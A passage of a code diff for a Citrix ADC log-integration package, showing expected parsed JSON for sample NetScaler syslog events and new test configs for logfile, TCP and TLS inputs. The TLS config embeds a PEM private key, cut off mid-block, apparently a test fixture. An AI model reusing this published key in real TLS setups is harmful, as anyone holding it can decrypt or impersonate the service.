"client_port": 2357, + "client_version": "TLSv1.3", + "handshake_time": "55", + "message": "SPCBId 3376175 - ClientIP 1.128.0.1 - ClientPort 2357 - VserverServiceIP 1.128.0.2 - VserverServicePort 443 - ClientVersion TLSv1.3 - CipherSuite \"TLS1.3-AES256-GCM-SHA384\" - Session New - HandshakeTime 55 ms", + "session": "New", + "spcb_id": "3376175", + "vserver": { + 
"ip": "1.128.0.2", + "port": 443 + } + } + }, + "client": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.1", + "port": 2357 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "37819", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_HANDSHAKE_SUCCESS 37819 0 : SPCBId 3376175 - ClientIP 1.128.0.1 - ClientPort 2357 - VserverServiceIP 1.128.0.2 - VserverServicePort 443 - ClientVersion TLSv1.3 - CipherSuite \"TLS1.3-AES256-GCM-SHA384\" - Session New - HandshakeTime 55 ms", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "1.128.0.2", + "1.128.0.1" + ] + }, + "server": { + "ip": "1.128.0.2", + "port": 443 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "tls": { + "cipher": "TLS1.3-AES256-GCM-SHA384", + "version": "1.3", + "version_protocol": "TLS" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_HANDSHAKE_SUCCESS 37819 0 : Backend SPCBId 3376176 - ServerIP 10.10.41.205 - ServerPort 8443 - ProtocolVersion TLSv1.2 - CipherSuite \"TLS1.2-ECDHE-RSA-AES256-GCM-SHA384\" - Session New - SERVER_AUTHENTICATED -SerialNumber \"12CF1F64F01429F7\" - SignatureAlgorithm \"sha256WithRSAEncryption\" - ValidFrom \"Apr 20 07:46:28 2023 GMT\" - ValidTo \"May 1 20:22:03 2024 GMT\" - HandshakeTime 8 ms", + "device_event_class_id": "SSLLOG", + "extended": { + "message": "Backend SPCBId 3376176 - ServerIP 10.10.41.205 - ServerPort 8443 - ProtocolVersion TLSv1.2 - CipherSuite \"TLS1.2-ECDHE-RSA-AES256-GCM-SHA384\" - Session New - SERVER_AUTHENTICATED -SerialNumber \"12CF1F64F01429F7\" - SignatureAlgorithm \"sha256WithRSAEncryption\" - ValidFrom \"Apr 20 07:46:28 2023 GMT\" 
- ValidTo \"May 1 20:22:03 2024 GMT\" - HandshakeTime 8 ms" + }, + "facility": "local0", + "host": "ns1", + "name": "SSL_HANDSHAKE_SUCCESS", + "priority": "info" + }, + "citrix_adc": { + "log": { + "cipher_suite": "TLS1.2-ECDHE-RSA-AES256-GCM-SHA384", + "handshake_time": "8", + "message": "Backend SPCBId 3376176 - ServerIP 10.10.41.205 - ServerPort 8443 - ProtocolVersion TLSv1.2 - CipherSuite \"TLS1.2-ECDHE-RSA-AES256-GCM-SHA384\" - Session New - SERVER_AUTHENTICATED -SerialNumber \"12CF1F64F01429F7\" - SignatureAlgorithm \"sha256WithRSAEncryption\" - ValidFrom \"Apr 20 07:46:28 2023 GMT\" - ValidTo \"May 1 20:22:03 2024 GMT\" - HandshakeTime 8 ms", + "protocol_version": "TLSv1.2", + "serial_number": "12CF1F64F01429F7", + "server": { + "ip": "10.10.41.205", + "port": 8443 + }, + "server_authentication": "SERVER_AUTHENTICATED", + "session": "New", + "signature_algorithm": "sha256WithRSAEncryption", + "spcb_id": "3376176", + "valid_from": "2023-04-20T07:46:28.000Z", + "valid_to": "2024-05-01T20:22:03.000Z" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "37819", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_HANDSHAKE_SUCCESS 37819 0 : Backend SPCBId 3376176 - ServerIP 10.10.41.205 - ServerPort 8443 - ProtocolVersion TLSv1.2 - CipherSuite \"TLS1.2-ECDHE-RSA-AES256-GCM-SHA384\" - Session New - SERVER_AUTHENTICATED -SerialNumber \"12CF1F64F01429F7\" - SignatureAlgorithm \"sha256WithRSAEncryption\" - ValidFrom \"Apr 20 07:46:28 2023 GMT\" - ValidTo \"May 1 20:22:03 2024 GMT\" - HandshakeTime 8 ms", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + 
"product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "10.10.41.205", + "81.2.69.144" + ] + }, + "source": { + "ip": "10.10.41.205", + "port": 8443 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "tls": { + "cipher": "TLS1.2-ECDHE-RSA-AES256-GCM-SHA384", + "version": "1.2", + "version_protocol": "TLS" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "default_class": true, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : default SSLLOG SSL_HANDSHAKE_ISSUERNAME 39207 0 : SPCBId 3376283 - IssuerName \" C=US,ST=Arizona,L=Scottsdale,O=GoDaddy.com, Inc.,OU=http://crts.godaddy.com/repository/,CN=Go Daddy Secure Certificate Authority - G2\"", + "device_event_class_id": "SSLLOG", + "extended": { + "message": "SPCBId 3376283 - IssuerName \" C=US,ST=Arizona,L=Scottsdale,O=GoDaddy.com, Inc.,OU=http://crts.godaddy.com/repository/,CN=Go Daddy Secure Certificate Authority - G2\"" + }, + "facility": "local0", + "host": "ns1", + "name": "SSL_HANDSHAKE_ISSUERNAME", + "priority": "info" + }, + "citrix_adc": { + "log": { + "issuer_name": " C=US,ST=Arizona,L=Scottsdale,O=GoDaddy.com, Inc.,OU=http://crts.godaddy.com/repository/,CN=Go Daddy Secure Certificate Authority - G2", + "message": "SPCBId 3376283 - IssuerName \" C=US,ST=Arizona,L=Scottsdale,O=GoDaddy.com, Inc.,OU=http://crts.godaddy.com/repository/,CN=Go Daddy Secure Certificate Authority - G2\"", + "spcb_id": "3376283" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "39207", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : 
default SSLLOG SSL_HANDSHAKE_ISSUERNAME 39207 0 : SPCBId 3376283 - IssuerName \" C=US,ST=Arizona,L=Scottsdale,O=GoDaddy.com, Inc.,OU=http://crts.godaddy.com/repository/,CN=Go Daddy Secure Certificate Authority - G2\"", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "tls": { + "server": { + "issuer": " C=US,ST=Arizona,L=Scottsdale,O=GoDaddy.com, Inc.,OU=http://crts.godaddy.com/repository/,CN=Go Daddy Secure Certificate Authority - G2" + } + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "default_class": true, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : default SSLLOG SSL_HANDSHAKE_FAILURE 31626 0 : SPCBId 2558141 - ClientIP 1.128.0.0 - ClientPort 54686 - VserverServiceIP 1.128.0.1 - VserverServicePort 443 - ClientVersion TLSv1.0 - CipherSuite \"NA\"Session New - Reason \"Wrong protocol version in the message\"", + "device_event_class_id": "SSLLOG", + "extended": { + "message": "SPCBId 2558141 - ClientIP 1.128.0.0 - ClientPort 54686 - VserverServiceIP 1.128.0.1 - VserverServicePort 443 - ClientVersion TLSv1.0 - CipherSuite \"NA\"Session New - Reason \"Wrong protocol version in the message\"" + }, + "facility": "local0", + "host": "ns1", + "name": "SSL_HANDSHAKE_FAILURE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "cipher_suite": "NA", + "client_ip": "1.128.0.0", + "client_port": 54686, + "client_version": "TLSv1.0", + "message": "SPCBId 2558141 - ClientIP 1.128.0.0 - ClientPort 54686 - VserverServiceIP 1.128.0.1 - VserverServicePort 443 - ClientVersion TLSv1.0 - CipherSuite \"NA\"Session New - Reason \"Wrong protocol version in the message\"", + "reason": "Wrong protocol version in the message", + "session": "New", + "spcb_id": "2558141", + "vserver": { + 
"ip": "1.128.0.1", + "port": 443 + } + } + }, + "client": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.0", + "port": 54686 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "31626", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : default SSLLOG SSL_HANDSHAKE_FAILURE 31626 0 : SPCBId 2558141 - ClientIP 1.128.0.0 - ClientPort 54686 - VserverServiceIP 1.128.0.1 - VserverServicePort 443 - ClientVersion TLSv1.0 - CipherSuite \"NA\"Session New - Reason \"Wrong protocol version in the message\"", + "reason": "Wrong protocol version in the message", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "1.128.0.1", + "1.128.0.0" + ] + }, + "server": { + "ip": "1.128.0.1", + "port": 443 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "tls": { + "cipher": "NA", + "version": "1.0", + "version_protocol": "TLS" + } + }, + { + "@timestamp": "2015-06-22T19:14:37.000Z", + "citrix": { + "cef_format": false, + "detail": "06/22/2015:19:14:37 GMT ns 0-PPE-1 : SSLVPN HTTPREQUEST 4471 0 : Context someusername@1.128.0.0 - SessionId: 12690921 - example.domain.com User someusername : Group(s) N/A : Vserver 1.128.0.1:443 - 2022/06/14:16:07:48 : SSO is ON : GET /Citrix/Redacted/URL/Path - -", + "device_event_class_id": "SSLVPN", + "extended": { + "message": "Context someusername@1.128.0.0 - SessionId: 12690921 - example.domain.com User someusername : Group(s) N/A : Vserver 1.128.0.1:443 - 2022/06/14:16:07:48 : SSO is ON : GET /Citrix/Redacted/URL/Path - -" + }, + "facility": "local0", + "host": "ns", + "name": "HTTPREQUEST", + "priority": "info" + }, + "citrix_adc": { + "log": { + "client_ip": "1.128.0.0", + "groups": "N/A", + "hostname": "example.domain.com", + "message": "Context 
someusername@1.128.0.0 - SessionId: 12690921 - example.domain.com User someusername : Group(s) N/A : Vserver 1.128.0.1:443 - 2022/06/14:16:07:48 : SSO is ON : GET /Citrix/Redacted/URL/Path - -", + "method": "GET", + "request": { + "path": "/Citrix/Redacted/URL/Path" + }, + "session_id": "12690921", + "sso_status": "ON", + "timestamp": "2022-06-14T16:07:48.000Z", + "user": "someusername", + "username": "someusername", + "vserver": { + "ip": "1.128.0.1", + "port": 443 + } + } + }, + "client": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.0" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "authentication" + ], + "id": "4471", + "original": "Jun 22 19:14:37 81.2.69.144 06/22/2015:19:14:37 GMT ns 0-PPE-1 : SSLVPN HTTPREQUEST 4471 0 : Context someusername@1.128.0.0 - SessionId: 12690921 - example.domain.com User someusername : Group(s) N/A : Vserver 1.128.0.1:443 - 2022/06/14:16:07:48 : SSO is ON : GET /Citrix/Redacted/URL/Path - -", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "group": { + "name": "N/A" + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "1.128.0.1", + "1.128.0.0" + ], + "user": [ + "someusername" + ] + }, + "server": { + "ip": "1.128.0.1", + "port": 443 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "url": { + "domain": "example.domain.com" + }, + "user": { + "name": "someusername" + } + }, + { + "@timestamp": "2015-06-22T19:14:37.000Z", + "citrix": { + "cef_format": false, + "detail": "06/22/2015:19:14:37 GMT ns 0-PPE-1 : SSLVPN HTTPREQUEST 4471 0 : Context another.email@company.com@1.128.0.0- SessionId: 104248- some-domain.company.com User some.email@company.com : Group(s) N/A : Vserver 1.128.0.1:443 - 07/07/2022:11:22:00 GMT POST /Some/Url/Concealed - -", + "device_event_class_id": "SSLVPN", + "extended": { + "message": "Context 
another.email@company.com@1.128.0.0- SessionId: 104248- some-domain.company.com User some.email@company.com : Group(s) N/A : Vserver 1.128.0.1:443 - 07/07/2022:11:22:00 GMT POST /Some/Url/Concealed - -" + }, + "facility": "local0", + "host": "ns", + "name": "HTTPREQUEST", + "priority": "info" + }, + "citrix_adc": { + "log": { + "client_ip": "1.128.0.0", + "groups": "N/A", + "hostname": "some-domain.company.com", + "message": "Context another.email@company.com@1.128.0.0- SessionId: 104248- some-domain.company.com User some.email@company.com : Group(s) N/A : Vserver 1.128.0.1:443 - 07/07/2022:11:22:00 GMT POST /Some/Url/Concealed - -", + "method": "POST", + "request": { + "path": "/Some/Url/Concealed" + }, + "session_id": "104248", + "timestamp": "2022-07-07T11:22:00.000Z", + "timezone": "GMT", + "user": "some.email@company.com", + "username": "another.email@company.com", + "vserver": { + "ip": "1.128.0.1", + "port": 443 + } + } + }, + "client": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.0" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "authentication" + ], + "id": "4471", + "original": "Jun 22 19:14:37 81.2.69.144 06/22/2015:19:14:37 GMT ns 0-PPE-1 : SSLVPN HTTPREQUEST 4471 0 : Context another.email@company.com@1.128.0.0- SessionId: 104248- some-domain.company.com User some.email@company.com : Group(s) N/A : Vserver 1.128.0.1:443 - 07/07/2022:11:22:00 GMT POST /Some/Url/Concealed - -", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "group": { + "name": "N/A" + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "1.128.0.1", + "1.128.0.0" + ], + "user": [ + "another.email@company.com" + ] + }, + "server": { + "ip": "1.128.0.1", + "port": 443 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "url": { + "domain": "some-domain.company.com" + }, + "user": 
{ + "name": "another.email@company.com" + } + }, + { + "@timestamp": "2015-06-22T19:14:37.000Z", + "citrix": { + "cef_format": false, + "detail": "06/22/2015:19:14:37 GMT ns 0-PPE-1 : SSLVPN ICAEND_CONNSTAT 4471 0 : Source 1.128.0.0:54547 - Destination 1.128.0.1:444 - SSLRelayAddress 1.128.0.2:2598 - customername - username:domainname someusername:example.domain.com - startTime \"2022/06/14:16:17:51\" - endTime \"2022/06/14:16:18:18\" - Duration 00:00:27 - Total_bytes_send 193250 - Total_bytes_recv 36983 - Total_compressedbytes_send 0 - Total_compressedbytes_recv 0 - Compression_ratio_send 0.00% - Compression_ratio_recv 0.00% - connectionId 2812c48 - Total_bytes_wire_send 8028915850309104489 - Total_bytes_wire_recv 8320800952261094732", + "device_event_class_id": "SSLVPN", + "extended": { + "message": "Source 1.128.0.0:54547 - Destination 1.128.0.1:444 - SSLRelayAddress 1.128.0.2:2598 - customername - username:domainname someusername:example.domain.com - startTime \"2022/06/14:16:17:51\" - endTime \"2022/06/14:16:18:18\" - Duration 00:00:27 - Total_bytes_send 193250 - Total_bytes_recv 36983 - Total_compressedbytes_send 0 - Total_compressedbytes_recv 0 - Compression_ratio_send 0.00% - Compression_ratio_recv 0.00% - connectionId 2812c48 - Total_bytes_wire_send 8028915850309104489 - Total_bytes_wire_recv 8320800952261094732" + }, + "facility": "local0", + "host": "ns", + "name": "ICAEND_CONNSTAT", + "priority": "info" + }, + "citrix_adc": { + "log": { + "compression_ratio_recieved": 0.0, + "compression_ratio_send": 0.0, + "connection_id": "2812c48", + "destination": { + "ip": "1.128.0.1", + "port": 444 + }, + "domain_name": "example.domain.com", + "duration": "00:00:27", + "end_time": "2022-06-14T16:18:18.000Z", + "message": "Source 1.128.0.0:54547 - Destination 1.128.0.1:444 - SSLRelayAddress 1.128.0.2:2598 - customername - username:domainname someusername:example.domain.com - startTime \"2022/06/14:16:17:51\" - endTime \"2022/06/14:16:18:18\" - Duration 00:00:27 - 
Total_bytes_send 193250 - Total_bytes_recv 36983 - Total_compressedbytes_send 0 - Total_compressedbytes_recv 0 - Compression_ratio_send 0.00% - Compression_ratio_recv 0.00% - connectionId 2812c48 - Total_bytes_wire_send 8028915850309104489 - Total_bytes_wire_recv 8320800952261094732", + "source": { + "ip": "1.128.0.0", + "port": 54547 + }, + "ssl_relay": { + "address": "1.128.0.2", + "port": 2598 + }, + "start_time": "2022-06-14T16:17:51.000Z", + "total_bytes_received": 36983, + "total_bytes_send": 193250, + "total_bytes_wire_recieved": "8320800952261094732", + "total_bytes_wire_send": "8028915850309104489", + "total_compressed_bytes_recieved": 0, + "total_compressed_bytes_send": 0, + "username": "someusername" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "bytes": 36983, + "ip": "1.128.0.1", + "port": 444 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "authentication" + ], + "end": "2022-06-14T16:18:18.000Z", + "id": "4471", + "original": "Jun 22 19:14:37 81.2.69.144 06/22/2015:19:14:37 GMT ns 0-PPE-1 : SSLVPN ICAEND_CONNSTAT 4471 0 : Source 1.128.0.0:54547 - Destination 1.128.0.1:444 - SSLRelayAddress 1.128.0.2:2598 - customername - username:domainname someusername:example.domain.com - startTime \"2022/06/14:16:17:51\" - endTime \"2022/06/14:16:18:18\" - Duration 00:00:27 - Total_bytes_send 193250 - Total_bytes_recv 36983 - Total_compressedbytes_send 0 - Total_compressedbytes_recv 0 - Compression_ratio_send 0.00% - Compression_ratio_recv 0.00% - connectionId 2812c48 - Total_bytes_wire_send 8028915850309104489 - Total_bytes_wire_recv 8320800952261094732", + "severity": 0, + "start": "2022-06-14T16:17:51.000Z", + "timezone": "GMT", + "type": [ + "info" + ] + }, + 
"observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "1.128.0.0", + "1.128.0.1", + "81.2.69.144", + "1.128.0.2" + ], + "user": [ + "someusername" + ] + }, + "source": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "bytes": 193250, + "ip": "1.128.0.0", + "port": 54547 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "user": { + "domain": "example.domain.com", + "name": "someusername" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : UI CMD_EXECUTED 4471 0 : User jane.doe - ADM_User john - Remote_ip 192.168.1.105 - Command \"scp file.txt\" - Status \"Success\"", + "device_event_class_id": "UI", + "extended": { + "message": "User jane.doe - ADM_User john - Remote_ip 192.168.1.105 - Command \"scp file.txt\" - Status \"Success\"" + }, + "facility": "local0", + "host": "ns1", + "name": "CMD_EXECUTED", + "priority": "info" + }, + "citrix_adc": { + "log": { + "adm_user": "john", + "command": "scp file.txt", + "remote_ip": "192.168.1.105", + "status": "Success", + "user": "jane.doe" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "process" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : UI CMD_EXECUTED 4471 0 : User jane.doe - ADM_User john - Remote_ip 192.168.1.105 - Command \"scp file.txt\" - Status \"Success\"", + "outcome": "success", + "severity": 0, + "timezone": "GMT", + "type": [ + "start" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + 
"vendor": "Citrix" + }, + "process": { + "command_line": "scp file.txt" + }, + "related": { + "ip": [ + "192.168.1.105", + "81.2.69.144" + ], + "user": [ + "jane.doe" + ] + }, + "source": { + "ip": "192.168.1.105" + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "user": { + "name": "jane.doe" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_REST_VALIDATION 4471 0 : Rest Validation relaxation rule: Allow hit at url: https://service.example.org/query?id=1234", + "device_event_class_id": "APPFW", + "extended": { + "message": "Rest Validation relaxation rule: Allow hit at url: https://service.example.org/query?id=1234" + }, + "facility": "local0", + "host": "ns1", + "name": "APPFW_REST_VALIDATION", + "priority": "info" + }, + "citrix_adc": { + "log": { + "message": "Rest Validation relaxation rule: Allow hit at url: https://service.example.org/query?id=1234", + "rule": "Allow", + "url": "https://service.example.org/query?id=1234" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_REST_VALIDATION 4471 0 : Rest Validation relaxation rule: Allow hit at url: https://service.example.org/query?id=1234", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "url": 
{ + "domain": "service.example.org", + "original": "https://service.example.org/query?id=1234", + "path": "/query", + "query": "id=1234", + "scheme": "https" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_REST_VALIDATION 4471 0 : gRPC Validation relaxation rule: Allow hit at url: https://service.example.org/query?id=1234", + "device_event_class_id": "APPFW", + "extended": { + "message": "gRPC Validation relaxation rule: Allow hit at url: https://service.example.org/query?id=1234" + }, + "facility": "local0", + "host": "ns1", + "name": "APPFW_REST_VALIDATION", + "priority": "info" + }, + "citrix_adc": { + "log": { + "message": "gRPC Validation relaxation rule: Allow hit at url: https://service.example.org/query?id=1234", + "rule": "Allow", + "url": "https://service.example.org/query?id=1234" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_REST_VALIDATION 4471 0 : gRPC Validation relaxation rule: Allow hit at url: https://service.example.org/query?id=1234", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "url": { + "domain": "service.example.org", + "original": "https://service.example.org/query?id=1234", + "path": "/query", + "query": "id=1234", + "scheme": "https" + } + } + ] +} \ 
No newline at end of file
diff --git a/packages/citrix_adc/data_stream/log/_dev/test/pipeline/test-common-config.yml b/packages/citrix_adc/data_stream/log/_dev/test/pipeline/test-common-config.yml
new file mode 100644
index 00000000000..be41bb0d476
--- /dev/null
+++ b/packages/citrix_adc/data_stream/log/_dev/test/pipeline/test-common-config.yml
@@ -0,0 +1,4 @@
+fields:
+ tags:
+ - preserve_original_event
+ - preserve_duplicate_custom_fields
diff --git a/packages/citrix_adc/data_stream/log/_dev/test/system/test-logfile-config.yml b/packages/citrix_adc/data_stream/log/_dev/test/system/test-logfile-config.yml
new file mode 100644
index 00000000000..1587dd9215d
--- /dev/null
+++ b/packages/citrix_adc/data_stream/log/_dev/test/system/test-logfile-config.yml
@@ -0,0 +1,7 @@
+service: citrix-adc-logfile
+input: logfile
+data_stream:
+ vars:
+ paths:
+ - "{{SERVICE_LOGS_DIR}}/*.log"
+ preserve_original_event: true
diff --git a/packages/citrix_adc/data_stream/log/_dev/test/system/test-tcp-config.yml b/packages/citrix_adc/data_stream/log/_dev/test/system/test-tcp-config.yml
new file mode 100644
index 00000000000..ae4b6864d46
--- /dev/null
+++ b/packages/citrix_adc/data_stream/log/_dev/test/system/test-tcp-config.yml
@@ -0,0 +1,8 @@
+service: citrix-adc-tcp
+service_notify_signal: SIGHUP
+input: tcp
+data_stream:
+ vars:
+ listen_address: 0.0.0.0
+ listen_port: 9560
+ preserve_original_event: true
diff --git a/packages/citrix_adc/data_stream/log/_dev/test/system/test-tls-config.yml b/packages/citrix_adc/data_stream/log/_dev/test/system/test-tls-config.yml
new file mode 100644
index 00000000000..469f6623e21
--- /dev/null
+++ b/packages/citrix_adc/data_stream/log/_dev/test/system/test-tls-config.yml
@@ -0,0 +1,60 @@
+service: citrix-adc-tls
+service_notify_signal: SIGHUP
+input: tcp
+data_stream:
+ vars:
+ listen_address: 0.0.0.0
+ listen_port: 9561
+ preserve_original_event: true
+ ssl: |
+ key: |
+ -----BEGIN PRIVATE KEY-----
+ MIIEvwIBADANBgkqhkiG9w0BAQEFAASCBKkwggSlAgEAAoIBAQDhCLvLsQAHufsN
+ U+u1x/CequAUphfXZqLhDo2Eo/holfBS0+ey4bnzPL6lS9NFL5JkLQA2gYESqsXU
+ /Ru8E76Az1egzMwT3TVAPLVU8NbrxBqeNiQa2m9wC37HQy4qC9OxL28LUoKtFjxS
+ cD1sa0oikXCJN1a3BSoAf9iiZ/dxz4WVfrNhrzq2JFXjravY84n5ujkZOg45Pg70
+ 4vHOeg0rBbIoSNfjDUVZWjwC95K1BMN3msOTL9juv/EDa6BujqCxl+G1nY7JPFDL
+ SHWis65p+1AAa5xieYDb47vyJ0SSR7lEURTXZOkkM6k5JWfgkATEmGzRxPkOloIT
+ Xg9ag1OlAgMBAAECggEAEHfPJmzhj68wjB0kFr13AmWG2Hv/Kqg8KzQhbx+AwkaW
+ u7j+L70NGpvLZ9VQtLNyhxoz9cksZO1SZO/Q48aeHlcOFppmJN3/U6AdtQWa9M35
+ FLLpmX16wjxVHsfvzOvopgLOoYl8PqZt66qDFDgVyMnT7na6RdJ+7GJuvBPXq+Bc
+ vgThvAZitHSAOhnBFYmTMlBi6AzOMMsaFlgE3Xf9v3M0pAKItPRKMhXlC3MyvA/v
+ jgbra4Ib+0ryohggHheHB3bn3Jgv7iFKoW9OQSePVxacJ+kfr9H+No5g495URzqR
+ mx/96WCiv3rAh3ct8Sk/C4/3zMC8fUueDJIVjhgw0QKBgQD8NufLINNkIpBrLoCS
+ 972oFEjZB2u6EusQ7X9raROqpaw26ZSu+zSHeIKCGQ93M3aRb3FpdGeOxgZ095MV
+ 8a+nlh4stOvHj2Mm5YhTBDUavTC7o9aVR3Od5eTXUpHnaJpNI/uyIcKupeK1UJnV
+ UlBLeIwo/vJ1gsVrKMMAJkuKbwKBgQDkaWRRd0w2gUIbCTGf203BqXft0VdIiOW7
+ +gnkeaNHAf09XljzxMcQzrB8kG63aKVGbJffphEfzxtiJ+HRQVH+7QpKRhU/GHmu
+ +6OKkxTcxJm5zhoRFxcSi2wG4PWmUGJvc7ss1OJGcaOUxwocCepO7N/jfdDz9Uke
+ KnA+YWOdKwKBgQDteZkYlojT0QOgF8HyH5gQyUCqMKWLJ0LzxltiPCbLV4Dml1pq
+ w5Z7M8nWS1hXiTpLx93GSFc1hFkSCwYP9GfK6Lryp0sVtHnMZvTMDbseuSJImwRx
+ vDwtYQfugg1lEQWwOoBEAiu3m/PxernNtNprpU57T0nlwUK3GkM5QdWAuwKBgQCZ
+ ZF3GiANapzupxGbbH//8Cr9LqsafI7CEqMpz8WxBh4h16iJ6sq+tDeFgBe8UpOY5
+ gTwNKg1d+0w8guQYD3HtbWr3rlEeamVtqfiOW3ArQqyqJ0tCJuuLvK3zgKf35Qv2
